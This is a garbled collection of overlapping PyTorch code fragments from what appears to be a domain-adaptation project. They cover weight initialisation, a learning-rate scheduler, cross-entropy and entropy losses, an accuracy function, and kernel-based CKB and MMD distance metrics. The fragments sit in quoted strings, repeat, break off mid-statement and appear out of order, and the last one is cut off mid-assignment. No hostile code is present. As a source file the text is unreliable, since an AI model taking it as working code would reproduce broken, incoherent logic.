torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type')", "(B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical", "# CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): #", "0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d')", "U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) )", "+= plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num,", "x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx, (X, lab) in", "to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy", "x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx, (X,", "#====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist", "torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif 
classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert", "U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB", "!= -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear')", "def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0,", "Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam", "Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam #", "i = 0 for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay']", "B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t,", "fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t =", "Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t,", "2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach()", "-1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0,", "G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s =", "sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt", "-\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm(", "torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt =", "2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t", "( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt", "fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs", "B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s", "S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = 
B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) )", "!= -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def", "-1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x):", "to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad():", "= fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif", "(B_t + B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t =", "K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs", "return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate", "(H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s", "for batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob", "R_{st} ======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t =", "\"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif", "!= -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif", "inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor", "= m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0,", "D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach()", "== 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t", "Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist", "Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s)", "+ B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize", "= fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t())", "to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy =", "** (-power) i = 0 for param_group in optimizer.param_groups: param_group['lr'] = lr *", "CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = 
-(prob.mul(prob.log()+1e-4)).sum() return", "H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t", "return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss", "B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s,", "- (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s", "for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay *", "- (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s", "x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available():", "!= -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x", "= (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt =", "= num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t", "Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist #", "(-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s)", "utf-8 -*- import torch from torch.autograd import Variable import sys ################################## # Network", "lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct +=", "= H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #======", "(G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s +", "m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__", "+\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs =", "= (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist =", "(G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s =", "= FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset)", "(epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= #", "loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "gamma * iter_num) ** (-power) i = 0 for param_group in optimizer.param_groups: param_group['lr']", "+\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = 
D_XtXs.mean().detach()", "B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical", "= torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss", "= torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s)", "symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag())", "H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional", "fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear =", "= x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x", "G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t}", "to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def", "I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s =", "+\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs =", "Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss", "MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1)", "KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD", "= prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t,", "'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error:", "D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp()", "sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt", "P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type ==", "prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs =", "torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): 
x = x.cuda()", "1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy", "coding: utf-8 -*- import torch from torch.autograd import Variable import sys ################################## #", "Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t", "NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy", "= (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys =", "+\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach()", "prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs", "fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type", "#====== R_{st} ======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t", "#====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t", "numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct", "V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() -", "classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d')", "(-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean() - 2*K_XtXs.mean() return MMD_dist", "every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma * iter_num) **", "-(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls,", "D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp()", "(-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp()", "power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch", "HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s)", "(1 + gamma * iter_num) ** (-power) i = 0 for param_group in", "= (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t", "K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() +", "-\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ 
fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\", "2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s", "sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and", "= I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt -", "OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs", "to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def", "OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "-1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1", "if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct =", "m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or", "2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt =", "prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs", "K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs", "NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy", "classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0)", "prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s,", "= fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs", "matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = 
fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach()", "-\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt =", "= torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s", "S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag())", "D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by", "m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname", "and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t =", "= (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = 